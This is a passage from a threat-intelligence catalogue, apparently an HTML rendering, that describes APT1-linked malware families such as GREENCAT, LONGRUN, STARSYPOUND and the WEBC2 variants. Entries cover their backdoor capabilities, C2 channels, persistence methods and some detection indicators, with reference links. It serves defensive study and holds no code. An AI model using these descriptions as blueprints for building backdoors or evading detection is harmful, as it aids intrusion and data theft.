<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dairy"><a class="anchor" href="#_dairy"></a><a class="link" href="#_dairy">DAIRY</a></h3>
<div class="paragraph">
<p>Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2695. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_getmail"><a class="anchor" href="#_getmail"></a><a class="link" href="#_getmail">GETMAIL</a></h3>
<div class="paragraph">
<p>Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, one is a dll. The malware may create a registry artifact related to the executable.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2696. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gdocupload"><a class="anchor" href="#_gdocupload"></a><a class="link" href="#_gdocupload">GDOCUPLOAD</a></h3>
<div class="paragraph">
<p>This family of malware is a utility designed to upload files to Google Docs. Nearly all communications are with docs.google.com are SSL encrypted. The malware does not use Google&#8217;s published API to interact with their services. The malware does not currently work with Google Docs. It does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2697. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_glooxmail_2"><a class="anchor" href="#_glooxmail_2"></a><a class="link" href="#_glooxmail_2">GLOOXMAIL</a></h3>
<div class="paragraph">
<p>GLOOXMAIL communicates with Google&#8217;s Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that includes file upload and download, provide a remote shell, sending process listings, and terminating specified processes. The malware makes extensive use of the open source gloox library (<a href="http://camaya.net/gloox/" class="bare">http://camaya.net/gloox/</a>, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted.</p>
</div>
<div class="paragraph">
<p>GLOOXMAIL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TROJAN.GTALK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2698. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goggles"><a class="anchor" href="#_goggles"></a><a class="link" href="#_goggles">GOGGLES</a></h3>
<div class="paragraph">
<p>A family of downloader malware, that retrieves an encoded payload from a fixed location, usually in the form of a file with the .jpg extension. Some variants have just an .exe that acts as a downloader, others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory.</p>
</div>
<div class="paragraph">
<p>GOGGLES is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TROJAN.FOXY</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2699. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greencat"><a class="anchor" href="#_greencat"></a><a class="link" href="#_greencat">GREENCAT</a></h3>
<div class="paragraph">
<p>Members of this family are full featured backdoors that communicates with a Web-based Command &amp; Control (C2) server over SSL. Features include interactive shell, gathering system info, uploading and downloading files, and creating and killing processes, Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish persistence mechanism for them. Others contains functionality that allows it to install itself, replacing an existing Windows service, and uninstall itself. Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories, additional malware artifacts may be found there.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2700. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hackfase"><a class="anchor" href="#_hackfase"></a><a class="link" href="#_hackfase">HACKFASE</a></h3>
<div class="literalblock">
<div class="content">
<pre>This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL.</pre>
</div>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2701. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_helauto"><a class="anchor" href="#_helauto"></a><a class="link" href="#_helauto">HELAUTO</a></h3>
<div class="literalblock">
<div class="content">
<pre>This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation.</pre>
</div>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2702. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kurton"><a class="anchor" href="#_kurton"></a><a class="link" href="#_kurton">KURTON</a></h3>
<div class="paragraph">
<p>This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker but defaults to IPRIP if no service name is provided during install.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2703. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lightbolt"><a class="anchor" href="#_lightbolt"></a><a class="link" href="#_lightbolt">LIGHTBOLT</a></h3>
<div class="paragraph">
<p>LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2704. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lightdart"><a class="anchor" href="#_lightdart"></a><a class="link" href="#_lightdart">LIGHTDART</a></h3>
<div class="paragraph">
<p>LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file. This RAR file (1.rar) is renamed and uploaded to an attacker controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2705. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_longrun"><a class="anchor" href="#_longrun"></a><a class="link" href="#_longrun">LONGRUN</a></h3>
<div class="paragraph">
<p>LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string thequickbrownfxjmpsvalzydg is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2706. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_manitsme"><a class="anchor" href="#_manitsme"></a><a class="link" href="#_manitsme">MANITSME</a></h3>
<div class="paragraph">
<p>This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC looks for both the dropper file and the backdoor.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2707. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mapiget"><a class="anchor" href="#_mapiget"></a><a class="link" href="#_mapiget">MAPIGET</a></h3>
<div class="paragraph">
<p>This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2708. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html">http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_miniasp"><a class="anchor" href="#_miniasp"></a><a class="link" href="#_miniasp">MINIASP</a></h3>
<div class="paragraph">
<p>This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2709. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_newsreels"><a class="anchor" href="#_newsreels"></a><a class="link" href="#_newsreels">NEWSREELS</a></h3>
<div class="paragraph">
<p>The NEWSREELS malware family is an HTTP based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels, one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2710. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seasalt"><a class="anchor" href="#_seasalt"></a><a class="link" href="#_seasalt">SEASALT</a></h3>
<div class="paragraph">
<p>The SEASALT malware family communicates via a custom binary protocol. It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2711. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_starsypound"><a class="anchor" href="#_starsypound"></a><a class="link" href="#_starsypound">STARSYPOUND</a></h3>
<div class="paragraph">
<p>STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "<strong>(SY)# &lt;HOSTNAME&gt;" to the remote system, where &lt;HOSTNAME&gt; is the hostname of the victim system. The remote host responds with a packet that also begins with the string "</strong>(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2712. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sword"><a class="anchor" href="#_sword"></a><a class="link" href="#_sword">SWORD</a></h3>
<div class="paragraph">
<p>This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2713. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tabmsgsql"><a class="anchor" href="#_tabmsgsql"></a><a class="link" href="#_tabmsgsql">TABMSGSQL</a></h3>
<div class="literalblock">
<div class="content">
<pre>This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL.</pre>
</div>
</div>
<div class="paragraph">
<p>TABMSGSQL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TROJAN LETSGO</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2714. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tarsip_eclipse"><a class="anchor" href="#_tarsip_eclipse"></a><a class="link" href="#_tarsip_eclipse">TARSIP-ECLIPSE</a></h3>
<div class="paragraph">
<p>The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2715. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tarsip_moon"><a class="anchor" href="#_tarsip_moon"></a><a class="link" href="#_tarsip_moon">TARSIP-MOON</a></h3>
<div class="paragraph">
<p>The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in .pdb debug strings present in the malware samples. It does not provide a built in mechanism to maintain persistence.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2716. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_warp"><a class="anchor" href="#_warp"></a><a class="link" href="#_warp">WARP</a></h3>
<div class="paragraph">
<p>The WARP malware family is an HTTP based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When the WARP executing remote commands, the malware creates a copy of the ?%SYSTEMROOT%\system32\cmd.exe? file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2717. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_adspace"><a class="anchor" href="#_webc2_adspace"></a><a class="link" href="#_webc2_adspace">WEBC2-ADSPACE</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is capable of downloading and executing a file. All variants represented here are the same file with different MD5 signatures. This malware attempts to contact its C2 once a week (Thursday at 10:00 AM). It looks for commands inside a set of HTML tags, part of which are in the File Strings indicator term below.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2718. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_ausov"><a class="anchor" href="#_webc2_ausov"></a><a class="link" href="#_webc2_ausov">WEBC2-AUSOV</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware family is a only a downloader which operates over the HTTP protocol with a hard-coded URL. If directed, it has the capability to download, decompress, and execute compressed binaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2719. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_bolid"><a class="anchor" href="#_webc2_bolid"></a><a class="link" href="#_webc2_bolid">WEBC2-BOLID</a></h3>
<div class="literalblock">
<div class="content">
<pre>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware is a backdoor capable of downloading files and updating its configuration. Communication with the command and control (C2) server uses a combination of single-byte XOR and Base64 encoded data wrapped in standard HTML tags. The malware family installs a registry key as a persistence mechanism.</pre>
</div>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2720. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_clover"><a class="anchor" href="#_webc2_clover"></a><a class="link" href="#_webc2_clover">WEBC2-CLOVER</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The family of malware provides the attacker with an interactive command shell, the ability to upload and download files, execute commands on the system, list processes and DLLs, kill processes, and ping hosts on the local network. Responses to these commands are encrypted and compressed before being POSTed to the server. Some variants copy cmd.exe to Updatasched.exe in a temporary directory, and then may launch that in a process if an interactive shell is called. On initial invocation, the malware also attempts to delete previous copies of the Updatasched.exe file.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2721. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_cson"><a class="anchor" href="#_webc2_cson"></a><a class="link" href="#_webc2_cson">WEBC2-CSON</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware act only as downloaders and droppers for other malware. They communicate with a hard-coded C2 server, reading commands embedded in HTML comment fields. Some variants are executables which act upon execution, others are DLLs which can be attached to services or loaded through search order hijacking.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2722. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_div"><a class="anchor" href="#_webc2_div"></a><a class="link" href="#_webc2_div">WEBC2-DIV</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-DIV variant searches for the strings "div safe:" and " balance" to delimit encoded C2 information. If the decoded string begins with the letter "J" the malware will parse additional arguments in the decoded string to specify the sleep interval to use. WEBC2-DIV is capable of downloading a file, downloading and executing a file, or sleeping a specified interval.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2723. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
